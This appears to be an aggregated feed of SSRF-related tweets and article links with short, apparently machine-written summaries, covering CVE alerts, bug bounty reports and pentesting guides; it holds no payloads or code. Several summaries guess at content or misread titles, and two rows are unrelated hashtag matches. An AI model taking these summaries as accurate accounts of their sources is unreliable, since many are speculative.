7652024-08-15 12:28:18 UTC@Sursanjha: Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to make requests from the server-side potentially leading to unauthorized actions or information disclosure. #SSRF #OWASP #SecurityResearchThe content highlights Server-Side Request Forgery (SSRF) as a web security vulnerability enabling attackers to make requests from the server-side, risking unauthorized actions or information disclosure. The tweet emphasizes the importance of understanding and addressing SSRF to enhance web security. It references OWASP and Security Research as relevant areas for further exploration.
7662024-08-15 06:23:41 UTC@AbhijeetKumaw10: Day 12: Mastering Server Side Request Forgery Vulnerability Uncover hidden SSRF Vulnerability flaws with advanced payloads and Defense bypass techniques. Check out the full blog here: #BugBounty #WebSecurity #30daychallenge #ssrfThe content discusses mastering Server-Side Request Forgery (SSRF) vulnerability, revealing hidden flaws using advanced payloads and defense bypass techniques. The author shares insights in a blog post as part of a 30-day challenge, focusing on Bug Bounty, Web Security, and SSRF. The tweet provides a link to the full blog post for further details.
7672024-08-14 20:56:42 UTCCritical SAP Auth Bypass and SSRF Flaws Fixed Update NowCritical authentication bypass and Server-Side Request Forgery (SSRF) vulnerabilities in SAP have been addressed. Users are advised to update their systems immediately to mitigate the risks associated with these flaws. It is crucial to apply the fixes promptly to prevent potential exploitation by malicious actors.
7682024-08-14 15:23:41 UTCbasu_banakar: Thread On: Testing for Blind/Non-Blind SSRFs using redirection in integrations where there are some filters. #bugbountytips #BugBounty #ssrf #bugbountytips 1. Hit the integration by using burp collaborator by using random credentials.The content discusses testing for Blind/Non-Blind SSRFs using redirection in integrations with filters. The suggestion is to test by hitting the integration with Burp collaborator using random credentials. The post is shared on Twitter by basu_banakar. The focus is on bug bounty tips related to SSRF vulnerabilities.
7692024-08-14 15:23:41 UTCit4chis3c: Day 12: Mastering Server Side Request Forgery Vulnerability Uncover hidden SSRF Vulnerability flaws with advanced payloads and Defense bypass techniques. Check out the full blog here: #BugBounty #WebSecurity #30daychallenge #ssrfThe content discusses mastering Server-Side Request Forgery (SSRF) vulnerability, revealing hidden flaws using advanced payloads and defense bypass techniques. The blog provides insights into uncovering SSRF vulnerabilities. It is part of a 30-day challenge on Bug Bounty and Web Security. The full blog can be accessed through the provided link.
7702024-08-14 12:28:49 UTCCheckmarx: #CVE-2024-39338: Axios critical vulnerability alert! Versions 1.3.2 up to 1.7.3 allow Server-Side Request Forgery via URL manipulation. SSRF could lead to internal system access or data exfiltration. #SSRF #AppSecThe content warns about a critical vulnerability in Axios versions 1.3.2 to 1.7.3, allowing Server-Side Request Forgery (SSRF) through URL manipulation. This SSRF exploit could result in unauthorized access to internal systems or data theft. Checkmarx issued a CVE alert for this vulnerability, emphasizing the importance of addressing it promptly to prevent potential security breaches. #SSRF #AppSec.
7712024-08-14 11:28:40 UTCSOEhistory: August 14/15 1942: A waterborne raid by SOE's Small Scale Raiding Force (No. 62 Commando) led by Major Gus March-Phillipps destroys a German radar installation & nearby Flak sites. #GusMarchPhillipps #OperationBarricade #SSRF #62Commando #SOE #WW2On August 14/15, 1942, SOE's Small Scale Raiding Force (No. 62 Commando) led by Major Gus March-Phillipps conducted a successful waterborne raid, destroying a German radar installation and nearby Flak sites. This operation was known as Operation Barricade and was a significant event during World War II. The raid was a part of the activities of the Special Operations Executive (SOE) and showcased the bravery and effectiveness of the commandos involved.
7722024-08-14 08:56:45 UTCCritical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot ServicesA critical Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure allows hackers to compromise Health Bot Services. This vulnerability poses a significant security risk as it enables unauthorized access and manipulation of sensitive data within the Health Bot Services platform. It highlights the importance of addressing and patching such vulnerabilities promptly to prevent potential breaches and protect user information.
7732024-08-09 20:23:46 UTC@lu3ky13: learn everything about SSRF OPEN REDIRECT and #Subdomain #Takeover Server-Side Request Forgery (#SSRF) What is a Subdomain Takeover? What is open redirects Insecure Direct Object References (#IDOR) #bugbountytip #BugBountyThe content discusses Server-Side Request Forgery (SSRF), Open Redirect, Subdomain Takeover, and Insecure Direct Object References (IDOR) in the context of bug bounty programs. It provides information on what SSRF, Subdomain Takeover, and Open Redirect vulnerabilities are, along with tips for bug bounty hunters. The content is shared on Twitter by the user @lu3ky13.
7742024-08-09 11:18:35 UTC@nader_brandi: SSRF Techniques: Scenarios #SSRF #ServerSideRequestForgery #WebSecurity #AdvancedHacking #EthicalHacking #CyberSecurity #VulnerabilityResearch #SecurityTesting #AppSec #PenTesting #ExploitDev #NetworkSecurity #InfoSec #BugBountyTips #VulnDiscovery #BugBountyThe content shared by @nader_brandi on Twitter discusses SSRF (Server-Side Request Forgery) techniques through various scenarios. The post covers topics related to web security, ethical hacking, cyber security, vulnerability research, security testing, application security, penetration testing, exploit development, network security, information security, bug bounty tips, vulnerability discovery, and bug bounty programs. The tweet provides a link for further details.
7752024-08-09 09:41:10 UTCListen to the whispers: web timing attacks that actually workThe content discusses web timing attacks that are effective and practical. It emphasizes the importance of paying attention to subtle cues and signals in web timing attacks. These attacks can exploit timing vulnerabilities in web applications to gather sensitive information. By listening to these subtle timing differences, attackers can successfully carry out these attacks. The content highlights the significance of understanding and mitigating these types of attacks to enhance web application security.
7762024-08-06 04:58:32 UTC@thezigzag3: #Bitdefender #Vulnerability #Let #Attackers #Trigger #SSRF #attacksThe tweet by @thezigzag3 highlights a vulnerability in Bitdefender that allows attackers to trigger Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially be exploited by malicious actors to manipulate server requests and access sensitive information. It is crucial for users of Bitdefender to be aware of this issue and take necessary precautions to protect their systems from such attacks.
7772024-08-05 17:58:42 UTCMhoseintaghrir: #SSRF for a single nondisplaced rib fractureThe content mentions a Twitter post by user Mhoseintaghrir discussing #SSRF for a single nondisplaced rib fracture. The post likely provides information or insights related to managing this specific type of rib fracture. It suggests that the user may be sharing knowledge or experiences regarding the treatment or care of such injuries. For more details, the original Twitter post should be referred to.
7782024-08-05 14:53:26 UTC@coderadipv: Just published a new blog on Medium about Server-Side Request Forgery (SSRF) vulnerabilities! Dive in to learn how SSRF works and ways to protect against it. Check it out! #CyberSecurity #SSRF #Medium #infosecurity #blogging@coderadipv shared a new blog on Medium about Server-Side Request Forgery (SSRF) vulnerabilities. The post explains how SSRF works and offers tips on protecting against it. The focus is on cybersecurity, SSRF, and information security. The tweet includes a link to the Medium blog post for those interested in learning more.
7792024-08-05 14:53:25 UTC@coderadipv: Just completed the SSRF room on @RealTryHackMe ! Learning about Server-Side Request Forgery was super insightful. #cybersecurity #TryHackMe #SSRF #learning #infosec@coderadipv completed the SSRF room on @RealTryHackMe, finding Server-Side Request Forgery insights valuable for cybersecurity. The tweet highlights learning experiences in the cybersecurity field. #SSRF #cybersecurity #TryHackMe #infosec
7802024-08-03 00:05:33 UTCIcare hunter profile - YesWeHackThe content is a brief mention of an "Icare hunter profile" on the YesWeHack platform. It lacks specific details or information about the profile or the individual named Icare.
7812023-12-20 04:03:21 UTCXSSRF : The Matrimony of XSS and SSRF.The content discusses the concept of XSSRF, which is a combination of Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF). This fusion poses a significant security threat as it allows attackers to manipulate client-side scripts to make unauthorized requests to the server. By exploiting vulnerabilities in web applications, attackers can bypass security measures and potentially gain access to sensitive information or perform malicious actions. It is crucial for developers to be aware of XSSRF attacks and implement proper security measures to prevent such exploits.
7822023-11-14 04:24:58 UTCBreaking Down SSRF on PDF Generation: A Pentesting GuideThe content discusses SSRF (Server-Side Request Forgery) vulnerabilities in PDF generation, providing a pentesting guide. It likely delves into how SSRF can be exploited during PDF creation processes, highlighting potential security risks and offering insights on how to test for and mitigate these vulnerabilities. The guide may include techniques for identifying and exploiting SSRF issues, as well as recommendations for securing PDF generation processes against such attacks. Overall, it aims to educate readers on the importance of addressing SSRF vulnerabilities in PDF generation to enhance cybersecurity measures.
7842023-11-07 21:20:02 UTC11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023The content discusses a lab session focused on exploiting XML External Entity (XXE) vulnerabilities to conduct Server-Side Request Forgery (SSRF) attacks. This practical exercise likely involves demonstrating how attackers can manipulate XML input to access internal resources and potentially launch SSRF attacks. The lab aims to provide hands-on experience in understanding and mitigating these security risks. Participants will likely gain insights into the exploitation of XXE vulnerabilities and the associated SSRF attack vectors. The session may offer valuable insights into securing applications against such threats.
7852023-11-07 14:58:01 UTCTesting for SSRF with Burp SuiteThe content discusses testing for Server-Side Request Forgery (SSRF) using Burp Suite, a popular web vulnerability scanner. SSRF is a security vulnerability that allows attackers to send crafted requests from the server, potentially leading to unauthorized access or data leakage. Burp Suite can be used to detect and mitigate SSRF vulnerabilities by intercepting and analyzing requests, identifying potentially malicious URLs, and testing the server's response to different inputs. This process helps security professionals identify and address SSRF vulnerabilities in web applications to enhance their security posture.
7862023-11-01 03:24:00 UTCWhat are SSRF Attacks and How They Work to Disrupting Email SecuritySSRF attacks, or Server-Side Request Forgery, exploit vulnerabilities to manipulate servers into making unauthorized requests. Attackers can abuse SSRF to disrupt email security by tricking servers into sending malicious emails or accessing sensitive information. By exploiting SSRF vulnerabilities, attackers can bypass security measures and potentially compromise email systems. It is crucial for organizations to be aware of SSRF attacks and implement robust security measures to prevent unauthorized access and protect sensitive data.
7872023-11-01 03:23:58 UTCLatest server-side request forgery (SSRF) newsThe content is about the latest news related to server-side request forgery (SSRF). It appears to be a link to more detailed information on this topic, possibly discussing recent developments, trends, or incidents related to SSRF. The content seems to provide updates or insights on SSRF issues, but without further details, it is unclear what specific information is being shared.
7892023-10-07 21:59:28 UTCExploiting Non-Cloud SSRF for More Fun & ProfitThe content discusses exploiting Server-Side Request Forgery (SSRF) vulnerabilities outside of cloud environments for increased enjoyment and financial gain. It likely delves into techniques, strategies, and potential risks associated with leveraging SSRF vulnerabilities in non-cloud settings. The focus seems to be on exploring the possibilities and implications of SSRF exploitation beyond traditional cloud platforms.
7902023-04-01 04:22:23 UTCFun with SSRF - Turning the Kubernetes API Server into a port scannerThe content discusses the exploitation of Server-Side Request Forgery (SSRF) to turn the Kubernetes API Server into a port scanner. By leveraging SSRF vulnerabilities, attackers can manipulate the Kubernetes API Server to scan ports on other systems. This misuse of SSRF highlights the importance of securing APIs and preventing unauthorized access to sensitive resources.
7912023-02-24 04:38:14 UTCBlock or report hackerscrollsThe content suggests taking action against a user named "hackerscrolls" by either blocking or reporting them. The link provided seems to direct to a specific action related to this user. It implies that the user may be engaging in hacking activities or behavior that is deemed inappropriate or harmful. The content advises taking steps to prevent further interaction or to report the user for violating platform guidelines.
7922023-02-24 04:33:21 UTC/home/six2dez/.pentest-bookThe content mentions a file path "/home/six2dez/.pentest-book" and a URL link "https://ift.tt/jCZboYB". It appears to be related to a pentest book or resource. The file path suggests a location on a system while the URL may lead to additional information or content. It seems to be a reference to a specific file or resource related to penetration testing.
7932023-02-24 04:33:19 UTCSsrfThe content provided is a link to a webpage related to SSRF (Server-Side Request Forgery), a type of web vulnerability where an attacker can manipulate a web application to make unauthorized requests on behalf of the server. SSRF can be exploited to access internal systems, perform port scanning, or launch attacks on other servers. It is crucial for developers to be aware of SSRF risks and implement security measures to prevent such attacks.
7942023-02-17 12:53:38 UTChttps://hacklido.com/blog/294-ssrf-that-allowed-us-to-access-whole-infra-web-services-and-many-moreThe content discusses a Server-Side Request Forgery (SSRF) vulnerability that allowed unauthorized access to an organization's entire infrastructure, web services, and more. The vulnerability was exploited to gain access to sensitive information and potentially compromise the security of the organization. It highlights the importance of identifying and addressing SSRF vulnerabilities to prevent unauthorized access and protect sensitive data.
7952023-02-15 04:23:30 UTCSSRFIREThe content mentions "SSRFIRE" and provides a link: https://ift.tt/Rc7m3TD. The term "SSRFIRE" is not explained in the content, and the link appears to be a shortened URL. It is unclear what the content is about or what information is being shared.
7962023-02-14 04:58:25 UTCWeb Application, April 7 2022: Server-Side Request Forgery (SSRF)The content discusses Server-Side Request Forgery (SSRF) in web applications, dated April 7, 2022. It appears to be a link to further information on SSRF.
7972023-02-14 04:48:44 UTCServer-Side Request Forgery (SSRF) Attacks: The Ultimate GuideThe content discusses Server-Side Request Forgery (SSRF) attacks, providing a comprehensive guide on this cybersecurity threat. SSRF attacks involve manipulating a server to make unintended requests, potentially leading to data breaches or server exploitation. The guide likely covers how SSRF attacks work, common vulnerabilities, prevention measures, and mitigation strategies to protect against such attacks. It aims to educate readers on understanding, detecting, and defending against SSRF attacks to enhance cybersecurity defenses.
7982023-02-14 04:48:43 UTCHow To: Server-Side Request Forgery (SSRF)The content discusses Server-Side Request Forgery (SSRF) and provides a guide on how to perform it. SSRF is a vulnerability that allows attackers to make requests from a server, potentially accessing sensitive information or executing malicious actions. The guide likely includes techniques and examples of exploiting SSRF vulnerabilities. It is crucial for developers and security professionals to understand SSRF to prevent and mitigate such attacks.
7992023-02-14 04:48:41 UTCBeginner Guide To Exploit Server Side Request Forgery (SSRF) VulnerabilityThe content is a beginner's guide on exploiting Server Side Request Forgery (SSRF) vulnerabilities. SSRF is a type of security vulnerability that allows an attacker to make requests on behalf of the server. The guide likely covers the basics of SSRF, how to identify and exploit these vulnerabilities, and potentially includes tips on prevention and mitigation strategies. It aims to educate readers on understanding and exploiting SSRF vulnerabilities for security testing and awareness purposes.
8002023-01-29 15:19:24 UTCSSRFire - an automated SSRF finderSSRFire is an automated tool designed for finding Server-Side Request Forgery (SSRF) vulnerabilities. It helps identify potential security weaknesses in web applications that could be exploited by attackers. By automating the process of detecting SSRF flaws, SSRFire aims to enhance the security of web applications and prevent unauthorized access to sensitive data or resources. The tool can be a valuable asset for security professionals and developers looking to proactively address SSRF vulnerabilities in their applications.
8012023-01-29 15:09:28 UTCSSRF and Open Redirect CheatSheetThe content is a cheat sheet on Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilities. It likely provides information, tips, and examples related to these security risks. SSRF involves manipulating a server to make unintended requests, while Open Redirect allows attackers to redirect users to malicious websites. The cheat sheet may offer guidance on how to identify, prevent, and mitigate these vulnerabilities in web applications.
8022023-01-23 02:42:48 UTCServer-Side Request Forgery (SSRF) | Common Attacks & Risks | ImpervaSSRF, or Server-Side Request Forgery, is a prevalent web application attack that impacts both public-facing and internal servers. This type of attack poses significant risks to web applications.
8032023-01-23 02:42:19 UTCWhat is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security AcademyThe content discusses SSRF (Server-side request forgery), explaining its definition, common examples, and methods to identify and exploit different types of SSRF vulnerabilities. It aims to provide a tutorial on understanding and addressing SSRF risks in web security.
8042022-10-13 02:44:05 UTCHey man if I talk about the impact it is comparatively low than that of normal ssrf because of itsThe content discusses the impact of a specific type of vulnerability called Server-Side Request Forgery (SSRF), noting that its impact is relatively low compared to a typical SSRF. The post seems to imply that this particular SSRF vulnerability may have less severe consequences than others.
8052022-10-13 02:44:04 UTCServer-Side Request Forgery (SSRF)- PortSwigger LabsThe content discusses Server-Side Request Forgery (SSRF) as presented by PortSwigger Labs. SSRF is a vulnerability that allows attackers to manipulate a server into making requests on their behalf. This can lead to unauthorized access to internal systems, data theft, or server exploitation. Understanding SSRF is crucial for developers and security professionals to prevent such attacks and secure their systems. The link provided likely offers further details or resources on SSRF from PortSwigger Labs.
8062022-10-13 02:44:00 UTCLets Understand SSRF vulnerabilityThe content discusses the SSRF (Server-Side Request Forgery) vulnerability, which is a type of security issue where an attacker can manipulate a web application to make unauthorized requests on behalf of the server. SSRF can lead to data breaches, server exploitation, and even full system compromise. Understanding SSRF vulnerabilities is crucial for developers and security professionals to prevent such attacks and protect sensitive data. It is important to implement proper security measures and validate user input to mitigate the risks associated with SSRF vulnerabilities.
8072022-10-13 02:43:56 UTCExploiting XXE for SSRFThe content discusses exploiting XML External Entity (XXE) vulnerabilities to achieve Server-Side Request Forgery (SSRF) attacks. By manipulating XML input, attackers can trigger the server to make unintended requests to internal resources, potentially leading to data leakage or unauthorized access. This technique leverages the server's ability to parse XML data and can be used to bypass security measures. Understanding and mitigating XXE vulnerabilities is crucial to prevent SSRF attacks and protect sensitive information.
8082022-10-13 02:43:54 UTCTop 25 Server-Side Request Forgery (SSRF) Bug Bounty ReportsThe content discusses the top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports. It likely highlights significant instances where SSRF vulnerabilities were discovered and reported through bug bounty programs. SSRF is a type of security vulnerability that allows attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. The bug bounty reports likely showcase the impact and severity of SSRF vulnerabilities in various systems and emphasize the importance of addressing such issues to enhance cybersecurity.
8092022-10-13 02:43:48 UTCAWS internal metadata accessed through SSRF by Chaining an Open Redirect bugThe content discusses a security vulnerability where AWS internal metadata was accessed through Server-Side Request Forgery (SSRF) by exploiting an Open Redirect bug. This vulnerability allowed unauthorized access to sensitive AWS information. The method involved chaining the SSRF vulnerability with the Open Redirect bug to gain access to internal metadata. This highlights the importance of addressing and fixing such vulnerabilities to prevent unauthorized access to critical information stored on AWS servers.
8102022-10-13 02:43:47 UTCSSRF payloadsThe content mentions SSRF payloads, which are used in exploiting Server-Side Request Forgery vulnerabilities. These payloads can be utilized to manipulate servers into making requests to unintended destinations, potentially leading to data breaches or unauthorized access. It is crucial for developers to be aware of SSRF vulnerabilities and implement proper security measures to prevent such attacks.
8112022-10-13 02:43:43 UTCEscalating SSRF to Accessing all user PII information by aws metadataThe content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) being exploited to access all user Personally Identifiable Information (PII) through AWS metadata. This escalation highlights the potential risks associated with SSRF attacks and the importance of securing AWS configurations to prevent unauthorized access to sensitive data. The content likely provides insights on how attackers can leverage SSRF vulnerabilities to gain access to valuable information stored within AWS environments, emphasizing the need for robust security measures to protect against such threats.
8122022-10-13 02:43:41 UTCBlind SSRF - The Hide & Seek GameThe content discusses Blind Server-Side Request Forgery (SSRF) attacks, where attackers manipulate a server into making requests on their behalf without the server's knowledge. This technique can be used to access sensitive information or exploit vulnerabilities. The article likely delves into the challenges of detecting and preventing Blind SSRF attacks, highlighting the need for robust security measures to safeguard against this threat.
8132022-10-13 02:38:53 UTCChaining an Blind SSRF bug to Get an RCEThe content discusses the process of exploiting a Blind Server-Side Request Forgery (SSRF) vulnerability to achieve Remote Code Execution (RCE). By chaining these vulnerabilities, attackers can manipulate the server to execute arbitrary commands, potentially leading to unauthorized access and control over the system. This technique involves leveraging SSRF to interact with internal resources and ultimately escalate privileges to execute malicious code remotely. It highlights the importance of addressing and patching SSRF vulnerabilities to prevent such attacks and protect systems from exploitation.
8142022-10-13 02:38:46 UTCHow Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata accessThe content discusses how utilizing Github reconnaissance techniques helped the author discover nine significant Server-Side Request Forgery (SSRF) vulnerabilities that provided access to AWS metadata. The vulnerabilities were likely identified through searching Github repositories for sensitive information or misconfigurations that could be exploited. The findings highlight the importance of conducting thorough security assessments and utilizing tools like Github recon to identify and address potential vulnerabilities in systems that could lead to unauthorized access or data breaches.
8152022-10-13 02:38:42 UTCIntro to SSRFThe content is an introduction to Server-Side Request Forgery (SSRF) provided via a link. SSRF is a type of web vulnerability where an attacker can manipulate a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, or even server exploitation. Understanding SSRF is crucial for web security professionals to prevent such attacks and protect sensitive data. The link likely provides more in-depth information on SSRF and its implications for web security.
| 816 | 2022-10-13 02:38:40 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compromise! | The content discusses a progression from bypassing web cache and firewalls to exploiting Server-Side Request Forgery (SSRF) vulnerabilities, ultimately leading to compromising AWS credentials. The journey highlights the potential security risks associated with these vulnerabilities and the importance of securing systems against such attacks. |
| 817 | 2022-10-13 02:38:37 UTC | Vimeo upload function SSRF | The content mentions a security vulnerability related to Vimeo's upload function known as Server-Side Request Forgery (SSRF). This vulnerability could potentially allow attackers to manipulate the server into making unauthorized requests on their behalf. It is important for Vimeo to address and patch this vulnerability to prevent potential exploitation by malicious actors. |
| 818 | 2022-10-13 02:38:37 UTC | Just Gopher It: Escalating a Blind SSRF to RCE for $15k | The content discusses escalating a blind Server-Side Request Forgery (SSRF) vulnerability to Remote Code Execution (RCE) for a reward of $15,000. The method used involves exploiting the SSRF vulnerability to access internal services, then leveraging it to execute code on the server. The process is detailed in the content, highlighting the steps taken to turn a lower-level security issue into a critical RCE vulnerability. The article likely provides insights into the technical aspects of the exploit, the challenges faced, and the rewards reaped for successfully escalating the vulnerability. |
| 819 | 2022-10-13 02:38:36 UTC | Bypassing SSRF Protection | The content discusses the topic of bypassing Server-Side Request Forgery (SSRF) protection measures. SSRF is a vulnerability that allows attackers to send crafted requests from a server, potentially leading to unauthorized access or data leakage. By bypassing SSRF protection, attackers can circumvent security controls and exploit vulnerabilities in web applications. The article likely provides insights, techniques, or examples of how attackers can evade SSRF protection mechanisms to carry out malicious activities. It emphasizes the importance of implementing robust security measures to prevent SSRF attacks and safeguard sensitive data. |
| 820 | 2022-10-13 02:38:32 UTC | Vimeo SSRF with code execution potential. | The content discusses a security vulnerability in Vimeo known as Server-Side Request Forgery (SSRF) with the potential for code execution. The vulnerability could allow attackers to manipulate server requests and potentially execute malicious code. The link provided likely leads to more detailed information about this security issue. It is crucial for Vimeo to address and patch this vulnerability to prevent exploitation by malicious actors. |
| 821 | 2022-10-12 03:13:18 UTC | SSRF (Server Side Request Forgery) testing resources | The content discusses resources for testing SSRF (Server Side Request Forgery) vulnerabilities. SSRF is a security vulnerability that allows attackers to send crafted requests from a server, potentially leading to unauthorized access or data leakage. The provided link likely offers tools, techniques, or guidance for testing and mitigating SSRF vulnerabilities to enhance the security of web applications. |
| 822 | 2022-10-12 03:13:16 UTC | Server-Side Request Forgery | The content appears to be about Server-Side Request Forgery (SSRF), a security vulnerability where an attacker can manipulate a server into making unintended requests. SSRF can lead to data leaks, unauthorized access, and potential server exploitation. It is crucial for developers to be aware of SSRF risks and implement proper security measures to prevent such attacks. The link provided may offer more in-depth information on SSRF and how to protect against it. |
| 823 | 2022-10-12 03:13:14 UTC | Multiple HTTP Redirects to Bypass SSRF Protections | The content discusses a technique involving multiple HTTP redirects to circumvent Server-Side Request Forgery (SSRF) protections. This method utilizes a series of redirects to trick a server into accessing unintended resources, potentially bypassing security measures. It highlights a vulnerability that attackers could exploit to manipulate servers into making requests to unauthorized destinations. This technique poses a risk to systems relying on SSRF defenses, emphasizing the importance of implementing robust security measures to prevent such attacks. |
| 824 | 2022-08-02 13:58:25 UTC | A Glossary of Blind SSRF Chains | The content is a glossary of blind Server-Side Request Forgery (SSRF) chains discovered by Assetnote. It provides a comprehensive list of terminologies related to SSRF vulnerabilities, explaining each term in detail. The glossary aims to help readers understand the concepts and techniques associated with blind SSRF attacks. |
| 825 | 2021-10-08 19:31:48 UTC | Finding SSRF via HTML Injection inside a PDF file on AWS EC2 \| by Riyaz Wal | The article discusses how Server-Side Request Forgery (SSRF) can be exploited through HTML injection in a PDF file on AWS EC2, leading to data theft from AWS accounts. It highlights the risk by mentioning Capital One's loss of over 100 million bank records due to a similar issue. SSRF vulnerabilities can have severe consequences, emphasizing the importance of addressing and securing such vulnerabilities to prevent unauthorized access and data breaches. |
| 826 | 2021-04-15 13:41:57 UTC | Story of a really cool SSRF bug.. Hello all! My name is Vedant, also… \| by | Vedant, also known as Vegeta on Twitter, is a cybersecurity enthusiast and bug bounty hunter. He shares a story about discovering a significant Server-Side Request Forgery (SSRF) bug. This bug showcases his skills in identifying vulnerabilities and his passion for cybersecurity. |
| 827 | 2021-04-10 13:56:59 UTC | $10000 Facebook SSRF (Bug Bounty) \| by Amine Aboud \| Medium | The content discusses a bug bounty reward of $10,000 for a blind Server-Side Request Forgery (SSRF) vulnerability found on Facebook. The process involved subdomain enumeration, file bruteforcing, and code review to identify the SSRF issue. The author, Amine Aboud, highlights the methodology used to discover the vulnerability and emphasizes the importance of thorough testing to uncover such security flaws. |
| 828 | 2019-08-23 11:27:41 UTC | SSRF in the Wild | The content discusses SSRF (Server-Side Request Forgery) vulnerabilities found in real-world scenarios. It emphasizes that the analysis is not based on scientific methods but rather focuses on the prevalence of SSRFs in practical situations. The term "in the wild" suggests that these vulnerabilities are encountered in real-world environments rather than just theoretical discussions. The content likely provides insights into the frequency and impact of SSRF vulnerabilities discovered outside controlled testing environments. |
| 829 | 2019-04-20 07:00:40 UTC | PDFReacter SSRF to ROOT Level Local File Read which led to RCE | PDFReacter is a parser that converts HTML content to PDF. |
| 830 | 2018-10-16 03:44:51 UTC | AWS takeover through SSRF in JavaScript – Gwendal Le Coguic | The content seems to focus on the potential security risk of Server-Side Request Forgery (SSRF) vulnerabilities in JavaScript applications that could lead to an AWS takeover. SSRF allows attackers to manipulate a server into making requests to unintended destinations, potentially gaining control over AWS resources. This type of attack highlights the importance of securing applications against SSRF vulnerabilities to prevent unauthorized access and misuse of cloud services like AWS. |
| 831 | 2018-09-15 19:31:32 UTC | Into the Borg – SSRF inside Google production network \| OpnSec | In March 2018, a security researcher found an XSS vulnerability in Google Caja, a tool for embedding HTML/JavaScript securely. The issue was reported to Google and fixed in May 2018. The researcher tested Google Sites and Google Caja, discovering the vulnerability within Google's production network. The article discusses the process of identifying and reporting the XSS vulnerability, highlighting the importance of security testing in large-scale systems like Google's. |
| 832 | 2018-06-27 20:35:03 UTC | Server Side Request Forgery (SSRF) Testing | The content discusses Server Side Request Forgery (SSRF) testing for fun rather than for a bounty. The author discovered a website vulnerable to SSRF but did not elaborate on the exploitation process. |
| 833 | 2018-06-15 19:26:38 UTC | How i converted SSRF TO XSS in jira. | The content discusses the author's interest in bug bounty hunting and their focus on finding vulnerabilities like Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS) in Jira. The author shares their experience of converting SSRF into XSS, highlighting their dedication to discovering new vulnerabilities and improving their reconnaissance skills. |
| 834 | 2018-06-07 16:19:17 UTC | How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! | The content appears to be a brief introduction with minimal information provided. It mentions chaining four vulnerabilities on GitHub Enterprise, starting from SSRF execution to achieving Remote Code Execution (RCE). The author is identified as 🍊. |